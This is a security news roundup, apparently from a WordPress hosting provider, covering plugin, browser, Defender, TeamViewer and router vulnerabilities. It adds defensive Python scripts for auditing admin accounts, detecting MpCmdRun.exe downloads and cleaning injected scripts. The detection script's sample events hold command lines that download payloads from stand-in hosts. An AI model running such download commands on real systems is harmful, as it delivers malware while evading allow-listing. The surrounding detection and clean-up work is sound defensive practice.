Critical 0-day in The Plus Addons for Elementor Allows Site Takeover

Today, March 8, 2021, the Wordfence Threat Intelligence team became aware of a critical 0-day in The Plus Addons for Elementor, a premium plugin that Wordfence estimates has over 30,000 installations. The vulnerability was reported this morning to WPScan by Seravo, a hosting company. The flaw lets attackers create new administrative user accounts on vulnerable sites when user registration is enabled, and also lets them log in as existing administrative users.

The Plus Addons for Elementor Lite, the free version by the same developer, does not appear to be vulnerable to this exploit.

None of the sites currently under management by ProtectYourWP.com are affected by this bug.
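Since the attack described above ends with an unexpected administrator on the site, the two things worth checking on any site that ran the plugin are whether registration is open and whether every administrator account is one you created. The audit below is an added example, not Wordfence's or the plugin's code: it runs over constructed rows shaped like WordPress's own `wp_users`, `wp_usermeta` and `wp_options` tables (the account names, dates and the `known_admins` allowlist are made up; the PHP-serialised `wp_capabilities` format and the `users_can_register` option are real WordPress conventions, and the meta key carries your table prefix, assumed here to be `wp_`).

```python
import re
from datetime import datetime

# Constructed rows in the shape of wp_users / wp_usermeta / wp_options.
# Only the column names and the serialised role format are WordPress's own;
# the accounts, timestamps and option values are made up for this example.
USERS = [
    {"ID": 1, "user_login": "siteowner", "user_registered": "2019-04-02 10:11:12"},
    {"ID": 7, "user_login": "editor_jane", "user_registered": "2020-06-15 08:00:00"},
    {"ID": 42, "user_login": "wpsupp0rt", "user_registered": "2021-03-08 03:14:07"},
]
USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 7, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:6:"editor";b:1;}'},
    {"user_id": 42, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
]
OPTIONS = {"users_can_register": "1", "default_role": "subscriber"}

# Roles are stored as a PHP-serialised array of role name => true, e.g.
# a:2:{s:13:"administrator";b:1;s:6:"editor";b:1;}  -- pull out every name flagged b:1.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')
WP_DATE = "%Y-%m-%d %H:%M:%S"


def roles_of(serialized):
    """Return the set of role names enabled in a wp_capabilities value."""
    return set(ROLE_RE.findall(serialized or ""))


def audit(users, usermeta, options, known_admins, since, table_prefix="wp_"):
    """Report open registration and administrators not on the allowlist.

    `since` is the earliest date you consider suspicious (e.g. when the vulnerable
    plugin version was installed); admins registered on or after it are marked.
    """
    caps_key = table_prefix + "capabilities"
    caps = {m["user_id"]: m["meta_value"] for m in usermeta if m["meta_key"] == caps_key}
    cutoff = datetime.strptime(since, WP_DATE)

    report = {
        # WordPress stores the checkbox as the string "1" when "Anyone can register" is on.
        "open_registration": options.get("users_can_register") == "1",
        "unexpected_admins": [],
    }
    for u in users:
        if "administrator" not in roles_of(caps.get(u["ID"])):
            continue
        if u["user_login"] in known_admins:
            continue
        registered = datetime.strptime(u["user_registered"], WP_DATE)
        report["unexpected_admins"].append({
            "id": u["ID"],
            "login": u["user_login"],
            "registered": u["user_registered"],
            "after_cutoff": registered >= cutoff,
        })
    return report


if __name__ == "__main__":
    result = audit(USERS, USERMETA, OPTIONS, known_admins={"siteowner"}, since="2021-03-01 00:00:00")
    print("open registration:", result["open_registration"])
    for admin in result["unexpected_admins"]:
        print("unexpected administrator:", admin)
```

On a live site the same rows come from `SELECT ID, user_login, user_registered FROM wp_users` and the matching `wp_usermeta` rows; an account that is both unexpected and registered after the cutoff should be treated as attacker-created, and its sessions, application passwords and any files it uploaded reviewed rather than just deleting the user.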

Full details: https://www.wordfence.com/blog/2021/03/critical-0-day-in-the-plus-addons-for-elementor-allows-site-takeover

False Positive Vulnerability Report on Events Manager

The popular calendar plugin Events Manager was reported as containing a Cross-Site Scripting (XSS) vulnerability. The report turned out to be a false positive: there is no such vulnerability. Several vulnerability-tracking sites still list the plugin as vulnerable, so if you have it installed you may have been notified.

However, it is not an actual problem and you can safely continue using version 5.9.8.1 or later.

Google Chrome Bug Could Let Hackers Bypass CSP Protection; Update Web Browsers

If you haven’t recently updated your Chrome, Opera, or Edge web browser to the latest available version, it would be an excellent idea to do so as quickly as possible.

Cybersecurity researchers on Monday disclosed details of a zero-day flaw in Chromium-based web browsers for Windows, Mac and Android that has existed since Chrome 73 and could have allowed attackers to bypass Content Security Policy (CSP) rules entirely.

Full article: https://thehackernews.com/2020/08/chrome-csp-bypass.html

Microsoft Defender can ironically be used to download malware

A recent update to Windows 10’s Microsoft Defender antivirus solution ironically allows it to download malware and other files to a Windows computer.

In a recent Microsoft Defender update, the command-line MpCmdRun.exe tool has been updated to include the ability to download files from a remote location, which could be abused by attackers.

With this new feature, Microsoft Defender joins the long list of Windows programs that local attackers can abuse. Because MpCmdRun.exe is a signed Microsoft binary present on every Windows 10 machine, a download performed through it looks far more legitimate to allow-listing and to a casual reviewer than the same download made with a tool the attacker brought along.
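The practical defence is to watch for MpCmdRun.exe being invoked with its download switch, especially from a shell or from a copy of the binary that has been moved out of the Defender platform directory. The script below is an added detection example, not Microsoft's or BleepingComputer's code. It runs over a constructed set of process-creation events (the shape a Sysmon Event ID 1 or EDR feed would give you after normalisation; the hosts, users, URLs and paths are made up). The switch names `-DownloadFile`, `-url` and `-path` are the ones reported for this Defender version and are assumed here; the page itself does not list them.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
     "cmdline": '"MpCmdRun.exe" -Scan -ScanType 1'},
    {"host": "ws02", "user": "bob", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
     "cmdline": r"MpCmdRun.exe -DownloadFile -url http://203.0.113.10/payload.exe -path C:\Users\Public\update.exe"},
    {"host": "ws03", "user": "SYSTEM", "parent": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
     "cmdline": "MpCmdRun.exe -SignatureUpdate"},
    {"host": "ws04", "user": "carol", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\carol\Downloads\MpCmdRun.exe",   # copied out of its install directory
     "cmdline": r"mpcmdrun.exe -downloadfile -url https://files.example/x.dll -path C:\Temp\x.dll"},
]

# Switch names as reported for this Defender build (assumption, see lead-in).
DOWNLOAD_SWITCH = re.compile(r"(?:^|\s)[-/]downloadfile(?:\s|$)", re.IGNORECASE)
URL_ARG = re.compile(r"[-/]url\s+(\S+)", re.IGNORECASE)
PATH_ARG = re.compile(r"[-/]path\s+(\S+)", re.IGNORECASE)

# Where a legitimate MpCmdRun.exe lives; anything else is a relocated copy.
EXPECTED_DIRS = (
    r"c:\programdata\microsoft\windows defender\platform" + "\\",
    r"c:\program files\windows defender" + "\\",
)
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    host: str
    user: str
    url: str
    dest: str
    reasons: list = field(default_factory=list)


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_mpcmdrun_download(event):
    """Return a Finding if this event is MpCmdRun.exe being used as a downloader, else None."""
    if basename(event["image"]) != "mpcmdrun.exe":
        return None
    cmdline = event["cmdline"]
    if not DOWNLOAD_SWITCH.search(cmdline):
        return None

    url = URL_ARG.search(cmdline)
    dest = PATH_ARG.search(cmdline)
    finding = Finding(
        host=event["host"], user=event["user"],
        url=url.group(1) if url else "", dest=dest.group(1) if dest else "",
        reasons=["MpCmdRun.exe invoked with -DownloadFile"],
    )
    # Escalating context: the binary is normally run only by Defender itself from its own
    # platform directory, and Defender has no reason to fetch files over cleartext HTTP.
    if not event["image"].lower().startswith(EXPECTED_DIRS):
        finding.reasons.append("binary executed outside the Defender platform directory")
    parent = basename(event["parent"])
    if parent in SHELL_PARENTS:
        finding.reasons.append(f"launched from {parent}")
    if finding.url.lower().startswith("http://"):
        finding.reasons.append("cleartext http:// download")
    return finding


def scan(events):
    """Run the detector over a list of events and keep only the hits."""
    return [f for f in (detect_mpcmdrun_download(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host} {f.user}: {f.url} -> {f.dest}; " + "; ".join(f.reasons))
```

In production the first reason alone is worth an alert on most fleets, since there is no routine administrative use for Defender downloading arbitrary files; the extra reasons are there to prioritise, not to gate the alert.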

Full story at https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/

TeamViewer fixes bug that lets attackers access your PC

TeamViewer, the popular remote access and troubleshooting app, has patched a vulnerability that could let attackers quietly establish a connection to your computer and exploit the system further.

When successfully exploited, this bug would let an unauthenticated, remote actor execute code on your Windows PC, or obtain password hashes (e.g., for cracking via brute-force).

Full article: https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/

New Virus from the domain “js.donatelloflowfirstly[.]ga” is infecting many WordPress sites

This is an advertising injection/redirection JavaScript that sends your visitors off to malicious domains. The script in question is injected into EVERY post on affected sites.

Our clients should be automatically protected against most javascript injections such as this (but let us know if you see something like this on your site!).

A quick search for “donatelloflowfirstly” will bring up a bunch of sites which are affected – and a few with instructions on how to clean up the mess.
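Because the injection lands in the content of every post, the clean-up is a sweep over post content rather than over files. The script below is an added example (not ProtectYourWP's own tooling) that finds and strips `<script src=...>` tags whose host is the indicator domain above, working on constructed rows shaped like `wp_posts` (`ID`, `post_content`). Only the domain comes from this advisory; the script path, query string and post text are made up, and the defanged `[.]` spelling is handled so the indicator can be pasted as written.

```python
import re
from urllib.parse import urlsplit

# Indicator written defanged, exactly as the advisory above writes it.
INDICATORS = ["js.donatelloflowfirstly[.]ga"]

# Constructed wp_posts rows (ID -> post_content). The injected tag's path and query
# string are an assumption; only the domain is from the advisory.
SAMPLE_POSTS = {
    101: "<p>Hello world!</p>\n<script src='https://js.donatelloflowfirstly.ga/stat.js?v=1.0.0' type='text/javascript'></script>",
    102: '<script src="//js.donatelloflowfirstly.ga/stat.js"></script><h2>About</h2><p>Our company.</p>',
    103: '<p>Clean post with a legitimate embed</p><script src="https://www.example.org/widget.js"></script>',
    104: "<p>Two copies</p><script src='https://js.donatelloflowfirstly.ga/a.js'></script><script src='https://js.donatelloflowfirstly.ga/b.js'></script>",
}

# Matches an external <script src=...></script> tag and captures the quote style and the URL.
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*(['\"]?)([^'\"\s>]+)\1[^>]*>\s*</script\s*>",
    re.IGNORECASE | re.DOTALL,
)


def refang(domain):
    """'js.example[.]ga' -> 'js.example.ga'."""
    return domain.replace("[.]", ".").lower()


def host_of(src):
    """Hostname of a script URL; handles https://, protocol-relative // and bare host/path forms."""
    if "://" not in src and not src.startswith("//"):
        src = "//" + src
    return (urlsplit(src).hostname or "").lower()


def is_malicious_host(host, bad_domains):
    # Exact match or any subdomain of a listed domain.
    return any(host == d or host.endswith("." + d) for d in bad_domains)


def find_injected(html, indicators=INDICATORS):
    """Return the raw script tags in `html` that load from an indicator domain."""
    bad = [refang(d) for d in indicators]
    return [m.group(0) for m in SCRIPT_TAG.finditer(html)
            if is_malicious_host(host_of(m.group(2)), bad)]


def clean_post(html, indicators=INDICATORS):
    """Return `html` with the injected tags removed; legitimate scripts are left alone."""
    bad = [refang(d) for d in indicators]

    def strip(m):
        return "" if is_malicious_host(host_of(m.group(2)), bad) else m.group(0)

    return SCRIPT_TAG.sub(strip, html)


def sweep(posts, indicators=INDICATORS):
    """{post_id: (hit_count, cleaned_content)} for every post that carried an injection."""
    report = {}
    for pid, content in posts.items():
        hits = find_injected(content, indicators)
        if hits:
            report[pid] = (len(hits), clean_post(content, indicators))
    return report


if __name__ == "__main__":
    for pid, (hits, cleaned) in sweep(SAMPLE_POSTS).items():
        print(f"post {pid}: removed {hits} injected tag(s)")
```

Stripping the tags restores the posts but does not explain how they got there: the same sweep should be repeated after the entry point (a vulnerable plugin, a stolen admin account, a modified theme or `wp_options` entry) has been found and closed, because otherwise the content is simply re-injected.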

Work From Home Alert: Critical Bug Found in Old D-Link Router Models

Researchers find six bugs in consumer D-Link DIR-865L Wireless AC 1750 Dual Band Cloud Router.

D-Link is urging customers to replace its now obsolete line of DIR-865L Wireless Routers in reaction to a recently discovered critical command-injection bug that leaves users open to a denial-of-service attack.

The routers, first introduced in 2013, reached end-of-life support in Feb. 2016. In Aug. 2018, D-Link released a patch (1.20B01 beta) to address multiple security bugs. On Friday, Palo Alto Networks’ Unit 42 researchers publicly disclosed six additional bugs – one rated critical and five rated high severity.

“The vulnerabilities were found in the DIR-865L model of D-Link routers, which are meant for home network use,” researchers wrote. “The current trend towards working from home increases the likelihood of malicious attacks against home networks, which makes it even more imperative to keep our networking devices updated.”

Full article: https://threatpost.com/work-from-home-alert-critical-d-link-bug/156573/

When Your Biggest Security and Privacy Threats Come From the Ones You Love

Research examines the risks and design challenges of accounting for privacy threats in intimate relationships.

As technology has become more ubiquitous in people’s everyday lives, a new class of privacy threats has emerged in family, romantic, friendship, and caregiving relationships. Dubbed “intimate threats” by a recent academic paper in the Journal of Cybersecurity, these are the thorny risks that are intertwined with issues around location tracking, always-on monitoring or recording, online surveillance, and the control over technology accounts or devices.

Written by Karen Levy, a lawyer and sociologist, and information security luminary Bruce Schneier, the paper examines how the dynamics of different intimate relationships break the security model in a lot of systems. It examines real-world examples of this in action and also provides some recommendations for technology designers and security professionals to start rethinking how they build products and think about threat models and security use cases.

The use of technology in intimate relationships can quickly turn dark with very little recourse from the victim because the product was never designed to account for abuse cases.

“Facebook had a system for a while where you’d get your account back because they’d show you pictures and you’d click on the ones that are your friends, assuming that you know who they are but other people don’t,” Schneier says. “But your partner and your parents all know that stuff too. So it’s a great system, but it fails in the intimate context. It fails when your boyfriend takes over your account.”

Full article at https://www.darkreading.com/risk/when-your-biggest-security-and-privacy-threats-come-from-the-ones-you-love/d/d-id/1338053

Vulnerability Disclosures Drop in Q1 for First Time in a Decade

And now for some good news:

Even with more security issues published on Patch Tuesdays, the total number of software flaws dropped for the first three months of 2020, according to one tally.

The number of vulnerabilities reported publicly dropped in the first quarter of 2020 for the first time in at least a decade, falling nearly 20% to 4,968 compared with the same quarter last year, according to an analysis published on Thursday by Risk Based Security.

Full story at https://www.darkreading.com